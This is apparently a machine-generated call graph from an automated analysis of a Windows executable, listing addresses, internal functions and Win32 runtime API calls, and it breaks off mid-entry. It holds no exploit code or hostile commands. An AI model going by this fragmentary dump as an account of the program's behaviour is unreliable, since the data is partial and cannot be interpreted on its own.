API calls 86803->86850 86805 4646fc 86851 4426cd 59 API calls _wcslen 86805->86851 86807 464711 86809 40bc70 52 API calls 86807->86809 86815 46474b 86807->86815 86810 46472c 86809->86810 86852 461465 52 API calls _memmove 86810->86852 86812 464741 86813 40c600 52 API calls 86812->86813 86813->86815 86814 464793 86814->86757 86815->86814 86853 463ad5 64 API calls __wcsicoll 86815->86853 86817 430db2 86816->86817 86818 430d54 86816->86818 86817->86773 86819 4115d7 52 API calls 86818->86819 86820 430d74 86819->86820 86821 430da9 86820->86821 86822 4115d7 52 API calls 86820->86822 86821->86773 86822->86820 86824 457a84 86823->86824 86825 45780c _strcat moneypunct _wcslen _wcscpy 86823->86825 86824->86777 86825->86824 86826 45340c 85 API calls 86825->86826 86827 443006 57 API calls 86825->86827 86829 4135bb 46 API calls _malloc 86825->86829 86854 40f6f0 86825->86854 86862 44b3ac 57 API calls 86825->86862 86826->86825 86827->86825 86829->86825 86832 410d11 86831->86832 86833 410da9 VirtualProtect 86832->86833 86834 410d77 86832->86834 86833->86834 86834->86782 86834->86783 86835->86790 86836->86790 86837->86768 86838->86786 86839->86787 86840->86793 86841->86801 86842->86801 86844 408e94 86843->86844 86845 408e88 86843->86845 86844->86801 86846 408f40 VariantClear 86845->86846 86846->86844 86847->86767 86848->86801 86849->86801 86850->86805 86851->86807 86852->86812 86853->86814 86855 425de2 86854->86855 86856 40f6fc _wcslen 86854->86856 86855->86825 86857 40f710 WideCharToMultiByte 86856->86857 86858 40f756 86857->86858 86859 40f728 86857->86859 86858->86825 86860 4115d7 52 API calls 86859->86860 86861 40f735 WideCharToMultiByte 86860->86861 86861->86825 86862->86825 86863 416454 86900 416c70 86863->86900 86865 416460 GetStartupInfoW 86866 416474 86865->86866 86901 419d5a HeapCreate 86866->86901 86868 4164cd 86869 4164d8 86868->86869 86985 41642b 46 API calls 3 library calls 86868->86985 86902 417c20 GetModuleHandleW 86869->86902 86872 4164de 86873 4164e9 __RTC_Initialize 86872->86873 86986 41642b 46 API calls 3 library calls 86872->86986 86921 41aaa1 GetStartupInfoW 86873->86921 86877 416503 GetCommandLineW 86934 41f584 GetEnvironmentStringsW 86877->86934 86881 416513 86940 41f4d6 GetModuleFileNameW 86881->86940 86883 41651d 86884 416528 86883->86884 86988 411924 46 API calls 3 library calls 86883->86988 86944 41f2a4 86884->86944 86887 41652e 86888 416539 86887->86888 86989 411924 46 API calls 3 library calls 86887->86989 86958 411703 86888->86958 86891 416541 86893 41654c __wwincmdln 86891->86893 86990 411924 46 API calls 3 library calls 86891->86990 86962 40d6b0 86893->86962 86896 41657c 86992 411906 46 API calls _doexit 86896->86992 86899 416581 _raise 86900->86865 86901->86868 86903 417c34 86902->86903 86904 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86902->86904 86993 4178ff 49 API calls _free 86903->86993 86905 417c87 TlsAlloc 86904->86905 86909 417cd5 TlsSetValue 86905->86909 86910 417d96 86905->86910 86908 417c39 86908->86872 86909->86910 86911 417ce6 __init_pointers 86909->86911 86910->86872 86994 418151 InitializeCriticalSectionAndSpinCount 86911->86994 86913 417d91 87002 4178ff 49 API calls _free 86913->87002 86915 417d2a 86915->86913 86995 416b49 86915->86995 86918 417d76 87001 41793c 46 API calls 4 library calls 86918->87001 86920 417d7e GetCurrentThreadId 86920->86910 86922 416b49 __calloc_crt 46 API calls 86921->86922 86924 41aabf 86922->86924 86923 4164f7 86923->86877 86987 411924 46 API calls 3 library calls 86923->86987 86924->86923 86926 416b49 __calloc_crt 46 API calls 86924->86926 86928 41ac34 86924->86928 86933 41abb4 86924->86933 86925 41ac6a GetStdHandle 86925->86928 86926->86924 86927 41acce SetHandleCount 86927->86923 86928->86925 86928->86927 86929 41ac7c GetFileType 86928->86929 86932 41aca2 InitializeCriticalSectionAndSpinCount 86928->86932 86929->86928 86930 41abe0 GetFileType 86931 41abeb InitializeCriticalSectionAndSpinCount 86930->86931 86930->86933 86931->86923 86931->86933 86932->86923 86932->86928 86933->86928 86933->86930 86933->86931 86935 41f595 86934->86935 86936 41f599 86934->86936 86935->86881 87012 416b04 86936->87012 86938 41f5bb _memmove 86939 41f5c2 FreeEnvironmentStringsW 86938->86939 86939->86881 86941 41f50b _wparse_cmdline 86940->86941 86942 416b04 __malloc_crt 46 API calls 86941->86942 86943 41f54e _wparse_cmdline 86941->86943 86942->86943 86943->86883 86945 41f2bc _wcslen 86944->86945 86949 41f2b4 86944->86949 86946 416b49 __calloc_crt 46 API calls 86945->86946 86954 41f2e0 _wcslen 86946->86954 86947 41f336 87019 413748 86947->87019 86949->86887 86950 416b49 __calloc_crt 46 API calls 86950->86954 86951 41f35c 86952 413748 _free 46 API calls 86951->86952 86952->86949 86954->86947 86954->86949 86954->86950 86954->86951 86955 41f373 86954->86955 87018 41ef12 46 API calls _raise 86954->87018 87025 417ed3 86955->87025 86957 41f37f 86957->86887 86959 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86958->86959 86961 411750 __IsNonwritableInCurrentImage 86959->86961 87044 41130a 51 API calls __cinit 86959->87044 86961->86891 86963 42e2f3 86962->86963 86964 40d6cc 86962->86964 86965 408f40 VariantClear 86964->86965 86966 40d707 86965->86966 87045 40ebb0 86966->87045 86969 40d737 87048 411951 86969->87048 86974 40d751 87060 40f4e0 SystemParametersInfoW SystemParametersInfoW 86974->87060 86976 40d75f 87061 40d590 GetCurrentDirectoryW 86976->87061 86978 40d767 SystemParametersInfoW 86979 40d794 86978->86979 86980 40d78d FreeLibrary 86978->86980 86981 408f40 VariantClear 86979->86981 86980->86979 86982 40d79d 86981->86982 86983 408f40 VariantClear 86982->86983 86984 40d7a6 86983->86984 86984->86896 86991 4118da 46 API calls _doexit 86984->86991 86985->86869 86986->86873 86991->86896 86992->86899 86993->86908 86994->86915 86997 416b52 86995->86997 86998 416b8f 86997->86998 86999 416b70 Sleep 86997->86999 87003 41f677 86997->87003 86998->86913 86998->86918 87000 416b85 86999->87000 87000->86997 87000->86998 87001->86920 87002->86910 87004 41f683 87003->87004 87010 41f69e _malloc 87003->87010 87005 41f68f 87004->87005 87004->87010 87011 417f77 46 API calls __getptd_noexit 87005->87011 87007 41f6b1 HeapAlloc 87009 41f6d8 87007->87009 87007->87010 87008 41f694 87008->86997 87009->86997 87010->87007 87010->87009 87011->87008 87015 416b0d 87012->87015 87013 4135bb _malloc 45 API calls 87013->87015 87014 416b43 87014->86938 87015->87013 87015->87014 87016 416b24 Sleep 87015->87016 87017 416b39 87016->87017 87017->87014 87017->87015 87018->86954 87020 41377c __dosmaperr 87019->87020 87021 413753 RtlFreeHeap 87019->87021 87020->86949 87021->87020 87022 413768 87021->87022 87028 417f77 46 API calls __getptd_noexit 87022->87028 87024 41376e GetLastError 87024->87020 87029 417daa 87025->87029 87028->87024 87030 417dc9 __recalloc __call_reportfault 87029->87030 87031 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 87030->87031 87033 417eb5 __call_reportfault 87031->87033 87035 41a208 87033->87035 87034 417ed1 GetCurrentProcess TerminateProcess 87034->86957 87036 41a210 87035->87036 87037 41a212 IsDebuggerPresent 87035->87037 87036->87034 87043 41fe19 87037->87043 87040 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 87041 421ff0 __call_reportfault 87040->87041 87042 421ff8 GetCurrentProcess TerminateProcess 87040->87042 87041->87042 87042->87034 87043->87040 87044->86961 87101 40ebd0 87045->87101 87105 4182cb 87048->87105 87050 41195e 87112 4181f2 LeaveCriticalSection 87050->87112 87052 40d748 87053 4119b0 87052->87053 87054 4119d6 87053->87054 87055 4119bc 87053->87055 87054->86974 87055->87054 87147 417f77 46 API calls __getptd_noexit 87055->87147 87057 4119c6 87148 417f25 10 API calls _raise 87057->87148 87059 4119d1 87059->86974 87060->86976 87149 401f20 87061->87149 87063 40d5b6 IsDebuggerPresent 87064 40d5c4 87063->87064 87065 42e1bb MessageBoxA 87063->87065 87066 42e1d4 87064->87066 87067 40d5e3 87064->87067 87065->87066 87322 403a50 52 API calls 3 library calls 87066->87322 87219 40f520 87067->87219 87071 40d5fd GetFullPathNameW 87231 401460 87071->87231 87073 40d63b 87074 40d643 87073->87074 87075 42e231 SetCurrentDirectoryW 87073->87075 87076 40d64c 87074->87076 87323 432fee 6 API calls 87074->87323 87075->87074 87246 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 87076->87246 87079 42e252 87079->87076 87081 42e25a GetModuleFileNameW 87079->87081 87083 42e274 87081->87083 87084 42e2cb GetForegroundWindow ShellExecuteW 87081->87084 87085 401b10 52 API calls 87083->87085 87088 40d688 87084->87088 87089 42e281 87085->87089 87086 40d669 87254 4091e0 87086->87254 87087 40d656 87087->87086 87320 40e0c0 74 API calls __recalloc 87087->87320 87092 40d692 SetCurrentDirectoryW 87088->87092 87324 40d200 52 API calls 2 library calls 87089->87324 87092->86978 87095 42e28d 87325 40d200 52 API calls 2 library calls 87095->87325 87098 42e299 GetForegroundWindow ShellExecuteW 87099 42e2c6 87098->87099 87099->87088 87100 40ec00 LoadLibraryA GetProcAddress 87100->86969 87102 40d72e 87101->87102 87103 40ebd6 LoadLibraryA 87101->87103 87102->86969 87102->87100 87103->87102 87104 40ebe7 GetProcAddress 87103->87104 87104->87102 87106 4182e0 87105->87106 87107 4182f3 EnterCriticalSection 87105->87107 87113 418209 87106->87113 87107->87050 87109 4182e6 87109->87107 87140 411924 46 API calls 3 library calls 87109->87140 87112->87052 87114 418215 _raise 87113->87114 87115 418225 87114->87115 87116 41823d 87114->87116 87141 418901 46 API calls __NMSG_WRITE 87115->87141 87118 416b04 __malloc_crt 45 API calls 87116->87118 87124 41824b _raise 87116->87124 87120 418256 87118->87120 87119 41822a 87142 418752 46 API calls 6 library calls 87119->87142 87122 41825d 87120->87122 87123 41826c 87120->87123 87144 417f77 46 API calls __getptd_noexit 87122->87144 87127 4182cb __lock 45 API calls 87123->87127 87124->87109 87125 418231 87143 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 87125->87143 87129 418273 87127->87129 87131 4182a6 87129->87131 87132 41827b InitializeCriticalSectionAndSpinCount 87129->87132 87133 413748 _free 45 API calls 87131->87133 87134 418297 87132->87134 87135 41828b 87132->87135 87133->87134 87146 4182c2 LeaveCriticalSection _doexit 87134->87146 87136 413748 _free 45 API calls 87135->87136 87138 418291 87136->87138 87145 417f77 46 API calls __getptd_noexit 87138->87145 87141->87119 87142->87125 87144->87124 87145->87134 87146->87124 87147->87057 87148->87059 87326 40e6e0 87149->87326 87153 401f41 GetModuleFileNameW 87344 410100 87153->87344 87155 401f5c 87356 410960 87155->87356 87158 401b10 52 API calls 87159 401f81 87158->87159 87359 401980 87159->87359 87161 401f8e 87162 408f40 VariantClear 87161->87162 87163 401f9d 87162->87163 87164 401b10 52 API calls 87163->87164 87165 401fb4 87164->87165 87166 401980 53 API calls 87165->87166 87167 401fc3 87166->87167 87168 401b10 52 API calls 87167->87168 87169 401fd2 87168->87169 87367 40c2c0 87169->87367 87171 401fe1 87172 40bc70 52 API calls 87171->87172 87173 401ff3 87172->87173 87385 401a10 87173->87385 87175 401ffe 87392 4114ab 87175->87392 87178 428b05 87180 401a10 52 API calls 87178->87180 87179 402017 87181 4114ab __wcsicoll 58 API calls 87179->87181 87182 428b18 87180->87182 87183 402022 87181->87183 87185 401a10 52 API calls 87182->87185 87183->87182 87184 40202d 87183->87184 87186 4114ab __wcsicoll 58 API calls 87184->87186 87187 428b33 87185->87187 87188 402038 87186->87188 87190 428b3b GetModuleFileNameW 87187->87190 87189 402043 87188->87189 87188->87190 87191 4114ab __wcsicoll 58 API calls 87189->87191 87192 401a10 52 API calls 87190->87192 87193 40204e 87191->87193 87194 428b6c 87192->87194 87195 402092 87193->87195 87200 401a10 52 API calls 87193->87200 87202 428b90 _wcscpy 87193->87202 87196 40e0a0 52 API calls 87194->87196 87198 4020a3 87195->87198 87195->87202 87197 428b7a 87196->87197 87201 401a10 52 API calls 87197->87201 87199 428bc6 87198->87199 87400 40e830 53 API calls 87198->87400 87204 402073 _wcscpy 87200->87204 87205 428b88 87201->87205 87206 401a10 52 API calls 87202->87206 87210 401a10 52 API calls 87204->87210 87205->87202 87212 4020d0 87206->87212 87207 4020bb 87401 40cf00 53 API calls 87207->87401 87209 4020c6 87211 408f40 VariantClear 87209->87211 87210->87195 87211->87212 87213 402110 87212->87213 87217 401a10 52 API calls 87212->87217 87402 40cf00 53 API calls 87212->87402 87403 40e6a0 53 API calls 87212->87403 87216 408f40 VariantClear 87213->87216 87218 402120 moneypunct 87216->87218 87217->87212 87218->87063 87220 40f53c 87219->87220 87222 4295c9 __recalloc 87219->87222 88091 410120 87220->88091 87224 4295d9 GetOpenFileNameW 87222->87224 87223 40f545 88095 4102b0 SHGetMalloc 87223->88095 87224->87220 87225 40d5f5 87224->87225 87225->87071 87225->87073 87227 40f54c 88100 410190 GetFullPathNameW 87227->88100 87229 40f559 88111 40f570 87229->88111 88161 402400 87231->88161 87233 40146f 87235 428c29 _wcscat 87233->87235 88170 401500 87233->88170 87236 40147c 87236->87235 88178 40d440 87236->88178 87238 401489 87238->87235 87239 401491 GetFullPathNameW 87238->87239 87240 402160 52 API calls 87239->87240 87241 4014bb 87240->87241 87242 402160 52 API calls 87241->87242 87243 4014c8 87242->87243 87243->87235 87244 402160 52 API calls 87243->87244 87245 4014ee 87244->87245 87245->87073 87247 428361 87246->87247 87248 4103fc LoadImageW RegisterClassExW 87246->87248 88198 44395e EnumResourceNamesW LoadImageW 87247->88198 88197 410490 7 API calls 87248->88197 87251 40d651 87253 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87251->87253 87252 428368 87253->87087 87255 409202 87254->87255 87256 42d7ad 87254->87256 87311 409216 moneypunct 87255->87311 88456 410940 338 API calls 87255->88456 88459 45e737 90 API calls 3 library calls 87256->88459 87259 409386 87260 40939c 87259->87260 88457 40f190 10 API calls 87259->88457 87260->87088 87321 401000 Shell_NotifyIconW __recalloc 87260->87321 87262 4095b2 87262->87260 87264 4095bf 87262->87264 87263 409253 PeekMessageW 87263->87311 88458 401a50 338 API calls 87264->88458 87265 40d410 VariantClear 87265->87311 87267 42d8cd Sleep 87267->87311 87268 4095c6 LockWindowUpdate DestroyWindow GetMessageW 87268->87260 87271 4095f9 87268->87271 87270 42e13b 88473 40d410 VariantClear 87270->88473 87274 42e158 TranslateMessage DispatchMessageW GetMessageW 87271->87274 87274->87274 87275 42e188 87274->87275 87275->87260 87277 409567 PeekMessageW 87277->87311 87279 44c29d 52 API calls 87318 4094e0 87279->87318 87280 46f3c1 107 API calls 87280->87311 87281 40e0a0 52 API calls 87281->87311 87282 46fdbf 108 API calls 87282->87318 87283 42dcd2 WaitForSingleObject 87289 42dcf0 GetExitCodeProcess CloseHandle 87283->87289 87283->87311 87284 409551 TranslateMessage DispatchMessageW 87284->87277 87287 42dd3d Sleep 87287->87318 87288 47d33e 316 API calls 87288->87311 88466 40d410 VariantClear 87289->88466 87292 4094cf Sleep 87292->87318 87294 42d94d timeGetTime 88462 465124 53 API calls 87294->88462 87296 40c620 timeGetTime 87296->87318 87298 465124 53 API calls 87298->87318 87300 42dd89 CloseHandle 87300->87318 87302 42de19 GetExitCodeProcess CloseHandle 87302->87318 87303 403cd0 VariantClear 87305 42de88 Sleep 87303->87305 87305->87311 87308 45e737 90 API calls 87308->87311 87310 408cc0 201 API calls 87310->87311 87311->87259 87311->87263 87311->87265 87311->87267 87311->87270 87311->87277 87311->87280 87311->87281 87311->87283 87311->87284 87311->87287 87311->87288 87311->87292 87311->87294 87311->87308 87311->87310 87312 42e0cc VariantClear 87311->87312 87313 408f40 VariantClear 87311->87313 87311->87318 88199 4091b0 87311->88199 88257 40afa0 87311->88257 88283 4096a0 87311->88283 88410 408fc0 87311->88410 88445 40d150 87311->88445 88450 40d170 87311->88450 88460 465124 53 API calls 87311->88460 88461 40c620 timeGetTime 87311->88461 88472 40e270 VariantClear moneypunct 87311->88472 87312->87311 87313->87311 87314 401b10 52 API calls 87314->87318 87316 401980 53 API calls 87316->87318 87318->87279 87318->87282 87318->87296 87318->87298 87318->87300 87318->87302 87318->87303 87318->87305 87318->87311 87318->87314 87318->87316 87319 408f40 VariantClear 87318->87319 88463 45178a 54 API calls 87318->88463 88464 47d33e 338 API calls 87318->88464 88465 453bc6 54 API calls 87318->88465 88467 40d410 VariantClear 87318->88467 88468 443d19 67 API calls _wcslen 87318->88468 88469 4574b4 VariantClear 87318->88469 88470 4731e1 VariantClear 87318->88470 88471 4331a2 6 API calls 87318->88471 87319->87318 87320->87086 87321->87088 87322->87073 87323->87079 87324->87095 87325->87098 87327 40bc70 52 API calls 87326->87327 87328 401f31 87327->87328 87329 402560 87328->87329 87330 40256d __write_nolock 87329->87330 87331 402160 52 API calls 87330->87331 87333 402593 87331->87333 87340 4025bd 87333->87340 87404 401c90 87333->87404 87334 4026f0 52 API calls 87334->87340 87335 4026a7 87336 401b10 52 API calls 87335->87336 87343 4026db 87335->87343 87338 4026d1 87336->87338 87337 401b10 52 API calls 87337->87340 87408 40d7c0 52 API calls 2 library calls 87338->87408 87339 401c90 52 API calls 87339->87340 87340->87334 87340->87335 87340->87337 87340->87339 87407 40d7c0 52 API calls 2 library calls 87340->87407 87343->87153 87409 40f760 87344->87409 87347 410118 87347->87155 87349 42805d 87350 42806a 87349->87350 87465 431e58 87349->87465 87351 413748 _free 46 API calls 87350->87351 87353 428078 87351->87353 87354 431e58 82 API calls 87353->87354 87355 428084 87354->87355 87355->87155 87357 4115d7 52 API calls 87356->87357 87358 401f74 87357->87358 87358->87158 87360 4019a3 87359->87360 87364 401985 87359->87364 87361 4019b8 87360->87361 87360->87364 88080 403e10 53 API calls 87361->88080 87363 40199f 87363->87161 87364->87363 88079 403e10 53 API calls 87364->88079 87366 4019c4 87366->87161 87368 40c2c7 87367->87368 87369 40c30e 87367->87369 87372 40c2d3 87368->87372 87373 426c79 87368->87373 87370 40c315 87369->87370 87371 426c2b 87369->87371 87374 40c321 87370->87374 87375 426c5a 87370->87375 87377 426c4b 87371->87377 87378 426c2e 87371->87378 88081 403ea0 52 API calls __cinit 87372->88081 88086 4534e3 52 API calls 87373->88086 88082 403ea0 52 API calls __cinit 87374->88082 88085 4534e3 52 API calls 87375->88085 88084 4534e3 52 API calls 87377->88084 87384 40c2de 87378->87384 88083 4534e3 52 API calls 87378->88083 87384->87171 87384->87384 87386 401a30 87385->87386 87387 401a17 87385->87387 87389 402160 52 API calls 87386->87389 87388 401a2d 87387->87388 88087 403c30 52 API calls _memmove 87387->88087 87388->87175 87391 401a3d 87389->87391 87391->87175 87393 411523 87392->87393 87394 4114ba 87392->87394 88090 4113a8 58 API calls 3 library calls 87393->88090 87397 40200c 87394->87397 88088 417f77 46 API calls __getptd_noexit 87394->88088 87397->87178 87397->87179 87398 4114c6 88089 417f25 10 API calls _raise 87398->88089 87400->87207 87401->87209 87402->87212 87403->87212 87405 4026f0 52 API calls 87404->87405 87406 401c97 87405->87406 87406->87333 87407->87340 87408->87343 87410 40f6f0 54 API calls 87409->87410 87411 40f77b _strcat moneypunct 87410->87411 87469 40f850 87411->87469 87416 427c2a 87498 414d04 87416->87498 87418 40f7fc 87418->87416 87420 40f804 87418->87420 87485 414a46 87420->87485 87424 40f80e 87424->87347 87428 4528bd 87424->87428 87425 427c59 87504 414fe2 87425->87504 87427 427c79 87429 4150d1 _fseek 81 API calls 87428->87429 87430 452930 87429->87430 88004 452719 87430->88004 87433 452948 87433->87349 87434 414d04 __fread_nolock 61 API calls 87435 452966 87434->87435 87436 414d04 __fread_nolock 61 API calls 87435->87436 87437 452976 87436->87437 87438 414d04 __fread_nolock 61 API calls 87437->87438 87439 45298f 87438->87439 87440 414d04 __fread_nolock 61 API calls 87439->87440 87441 4529aa 87440->87441 87442 4150d1 _fseek 81 API calls 87441->87442 87443 4529c4 87442->87443 87444 4135bb _malloc 46 API calls 87443->87444 87445 4529cf 87444->87445 87446 4135bb _malloc 46 API calls 87445->87446 87447 4529db 87446->87447 87448 414d04 __fread_nolock 61 API calls 87447->87448 87449 4529ec 87448->87449 87450 44afef GetSystemTimeAsFileTime 87449->87450 87451 452a00 87450->87451 87452 452a36 87451->87452 87453 452a13 87451->87453 87455 452aa5 87452->87455 87456 452a3c 87452->87456 87454 413748 _free 46 API calls 87453->87454 87457 452a1c 87454->87457 87459 413748 _free 46 API calls 87455->87459 88010 44b1a9 87456->88010 87460 413748 _free 46 API calls 87457->87460 87462 452aa3 87459->87462 87463 452a25 87460->87463 87461 452a9d 87464 413748 _free 46 API calls 87461->87464 87462->87349 87463->87349 87464->87462 87466 431e64 87465->87466 87467 431e6a 87465->87467 87468 414a46 __fcloseall 82 API calls 87466->87468 87467->87350 87468->87467 87471 40f85d __recalloc _strlen 87469->87471 87472 40f7ab 87471->87472 87517 414db8 87471->87517 87473 4149c2 87472->87473 87532 414904 87473->87532 87475 40f7e9 87475->87416 87476 40f5c0 87475->87476 87481 40f5cd _strcat __write_nolock _memmove 87476->87481 87477 414d04 __fread_nolock 61 API calls 87477->87481 87479 425d11 87480 4150d1 _fseek 81 API calls 87479->87480 87482 425d33 87480->87482 87481->87477 87481->87479 87484 40f691 __tzset_nolock 87481->87484 87620 4150d1 87481->87620 87483 414d04 __fread_nolock 61 API calls 87482->87483 87483->87484 87484->87418 87486 414a52 _raise 87485->87486 87487 414a64 87486->87487 87488 414a79 87486->87488 87760 417f77 46 API calls __getptd_noexit 87487->87760 87490 415471 __lock_file 47 API calls 87488->87490 87495 414a74 _raise 87488->87495 87493 414a92 87490->87493 87491 414a69 87761 417f25 10 API calls _raise 87491->87761 87744 4149d9 87493->87744 87495->87424 87829 414c76 87498->87829 87500 414d1c 87501 44afef 87500->87501 87997 442c5a 87501->87997 87503 44b00d 87503->87425 87505 414fee _raise 87504->87505 87506 414ffa 87505->87506 87507 41500f 87505->87507 88001 417f77 46 API calls __getptd_noexit 87506->88001 87509 415471 __lock_file 47 API calls 87507->87509 87510 415017 87509->87510 87512 414e4e __ftell_nolock 51 API calls 87510->87512 87511 414fff 88002 417f25 10 API calls _raise 87511->88002 87514 415024 87512->87514 88003 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87514->88003 87516 41500a _raise 87516->87427 87518 414dd6 87517->87518 87519 414deb 87517->87519 87528 417f77 46 API calls __getptd_noexit 87518->87528 87519->87518 87521 414df2 87519->87521 87530 41b91b 79 API calls 12 library calls 87521->87530 87522 414ddb 87529 417f25 10 API calls _raise 87522->87529 87525 414e18 87526 414de6 87525->87526 87531 418f98 77 API calls 6 library calls 87525->87531 87526->87471 87528->87522 87529->87526 87530->87525 87531->87526 87534 414910 _raise 87532->87534 87533 414923 87588 417f77 46 API calls __getptd_noexit 87533->87588 87534->87533 87537 414951 87534->87537 87536 414928 87589 417f25 10 API calls _raise 87536->87589 87551 41d4d1 87537->87551 87540 414956 87541 41496a 87540->87541 87542 41495d 87540->87542 87544 414992 87541->87544 87545 414972 87541->87545 87590 417f77 46 API calls __getptd_noexit 87542->87590 87568 41d218 87544->87568 87591 417f77 46 API calls __getptd_noexit 87545->87591 87547 414933 _raise @_EH4_CallFilterFunc@8 87547->87475 87552 41d4dd _raise 87551->87552 87553 4182cb __lock 46 API calls 87552->87553 87565 41d4eb 87553->87565 87554 41d560 87593 41d5fb 87554->87593 87555 41d567 87557 416b04 __malloc_crt 46 API calls 87555->87557 87559 41d56e 87557->87559 87558 41d5f0 _raise 87558->87540 87559->87554 87560 41d57c InitializeCriticalSectionAndSpinCount 87559->87560 87563 41d59c 87560->87563 87564 41d5af EnterCriticalSection 87560->87564 87561 418209 __mtinitlocknum 46 API calls 87561->87565 87566 413748 _free 46 API calls 87563->87566 87564->87554 87565->87554 87565->87555 87565->87561 87596 4154b2 47 API calls __lock 87565->87596 87597 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87565->87597 87566->87554 87569 41d23a 87568->87569 87570 41d255 87569->87570 87582 41d26c __wopenfile 87569->87582 87602 417f77 46 API calls __getptd_noexit 87570->87602 87571 41d421 87574 41d47a 87571->87574 87575 41d48c 87571->87575 87573 41d25a 87603 417f25 10 API calls _raise 87573->87603 87607 417f77 46 API calls __getptd_noexit 87574->87607 87599 422bf9 87575->87599 87579 41d47f 87608 417f25 10 API calls _raise 87579->87608 87580 41499d 87592 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87580->87592 87582->87571 87582->87574 87604 41341f 58 API calls 2 library calls 87582->87604 87584 41d41a 87584->87571 87605 41341f 58 API calls 2 library calls 87584->87605 87586 41d439 87586->87571 87606 41341f 58 API calls 2 library calls 87586->87606 87588->87536 87589->87547 87590->87547 87591->87547 87592->87547 87598 4181f2 LeaveCriticalSection 87593->87598 87595 41d602 87595->87558 87596->87565 87597->87565 87598->87595 87609 422b35 87599->87609 87601 422c14 87601->87580 87602->87573 87603->87580 87604->87584 87605->87586 87606->87571 87607->87579 87608->87580 87612 422b41 _raise 87609->87612 87610 422b54 87611 417f77 _raise 46 API calls 87610->87611 87613 422b59 87611->87613 87612->87610 87614 422b8a 87612->87614 87615 417f25 _raise 10 API calls 87613->87615 87616 422400 __tsopen_nolock 109 API calls 87614->87616 87619 422b63 _raise 87615->87619 87617 422ba4 87616->87617 87618 422bcb __wsopen_helper LeaveCriticalSection 87617->87618 87618->87619 87619->87601 87622 4150dd _raise 87620->87622 87621 4150e9 87651 417f77 46 API calls __getptd_noexit 87621->87651 87622->87621 87623 41510f 87622->87623 87633 415471 87623->87633 87626 4150ee 87652 417f25 10 API calls _raise 87626->87652 87632 4150f9 _raise 87632->87481 87634 415483 87633->87634 87635 4154a5 EnterCriticalSection 87633->87635 87634->87635 87637 41548b 87634->87637 87636 415117 87635->87636 87639 415047 87636->87639 87638 4182cb __lock 46 API calls 87637->87638 87638->87636 87640 415067 87639->87640 87641 415057 87639->87641 87646 415079 87640->87646 87654 414e4e 87640->87654 87709 417f77 46 API calls __getptd_noexit 87641->87709 87645 41505c 87653 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87645->87653 87671 41443c 87646->87671 87649 4150b9 87684 41e1f4 87649->87684 87651->87626 87652->87632 87653->87632 87655 414e61 87654->87655 87656 414e79 87654->87656 87710 417f77 46 API calls __getptd_noexit 87655->87710 87657 414139 __flush 46 API calls 87656->87657 87659 414e80 87657->87659 87662 41e1f4 __write 51 API calls 87659->87662 87660 414e66 87711 417f25 10 API calls _raise 87660->87711 87663 414e97 87662->87663 87664 414f09 87663->87664 87666 414ec9 87663->87666 87670 414e71 87663->87670 87712 417f77 46 API calls __getptd_noexit 87664->87712 87667 41e1f4 __write 51 API calls 87666->87667 87666->87670 87668 414f64 87667->87668 87669 41e1f4 __write 51 API calls 87668->87669 87668->87670 87669->87670 87670->87646 87672 414477 87671->87672 87673 414455 87671->87673 87677 414139 87672->87677 87673->87672 87674 414139 __flush 46 API calls 87673->87674 87675 414470 87674->87675 87713 41b7b2 77 API calls 5 library calls 87675->87713 87678 414145 87677->87678 87679 41415a 87677->87679 87714 417f77 46 API calls __getptd_noexit 87678->87714 87679->87649 87681 41414a 87715 417f25 10 API calls _raise 87681->87715 87683 414155 87683->87649 87685 41e200 _raise 87684->87685 87686 41e223 87685->87686 87687 41e208 87685->87687 87689 41e22f 87686->87689 87693 41e269 87686->87693 87736 417f8a 46 API calls __getptd_noexit 87687->87736 87738 417f8a 46 API calls __getptd_noexit 87689->87738 87691 41e20d 87737 417f77 46 API calls __getptd_noexit 87691->87737 87692 41e234 87739 417f77 46 API calls __getptd_noexit 87692->87739 87716 41ae56 87693->87716 87697 41e23c 87740 417f25 10 API calls _raise 87697->87740 87698 41e26f 87700 41e291 87698->87700 87701 41e27d 87698->87701 87741 417f77 46 API calls __getptd_noexit 87700->87741 87726 41e17f 87701->87726 87702 41e215 _raise 87702->87645 87705 41e289 87743 41e2c0 LeaveCriticalSection __unlock_fhandle 87705->87743 87706 41e296 87742 417f8a 46 API calls __getptd_noexit 87706->87742 87709->87645 87710->87660 87711->87670 87712->87670 87713->87672 87714->87681 87715->87683 87717 41ae62 _raise 87716->87717 87718 41aebc 87717->87718 87719 4182cb __lock 46 API calls 87717->87719 87720 41aec1 EnterCriticalSection 87718->87720 87721 41aede _raise 87718->87721 87722 41ae8e 87719->87722 87720->87721 87721->87698 87723 41aeaa 87722->87723 87724 41ae97 InitializeCriticalSectionAndSpinCount 87722->87724 87725 41aeec ___lock_fhandle LeaveCriticalSection 87723->87725 87724->87723 87725->87718 87727 41aded __close_nolock 46 API calls 87726->87727 87728 41e18e 87727->87728 87729 41e1a4 SetFilePointer 87728->87729 87730 41e194 87728->87730 87732 41e1bb GetLastError 87729->87732 87734 41e1c3 87729->87734 87731 417f77 _raise 46 API calls 87730->87731 87733 41e199 87731->87733 87732->87734 87733->87705 87734->87733 87735 417f9d __dosmaperr 46 API calls 87734->87735 87735->87733 87736->87691 87737->87702 87738->87692 87739->87697 87740->87702 87741->87706 87742->87705 87743->87702 87745 4149ea 87744->87745 87746 4149fe 87744->87746 87790 417f77 46 API calls __getptd_noexit 87745->87790 87747 4149fa 87746->87747 87749 41443c __flush 77 API calls 87746->87749 87762 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87747->87762 87752 414a0a 87749->87752 87750 4149ef 87791 417f25 10 API calls _raise 87750->87791 87763 41d8c2 87752->87763 87755 414139 __flush 46 API calls 87756 414a18 87755->87756 87767 41d7fe 87756->87767 87758 414a1e 87758->87747 87759 413748 _free 46 API calls 87758->87759 87759->87747 87760->87491 87761->87495 87762->87495 87764 414a12 87763->87764 87765 41d8d2 87763->87765 87764->87755 87765->87764 87766 413748 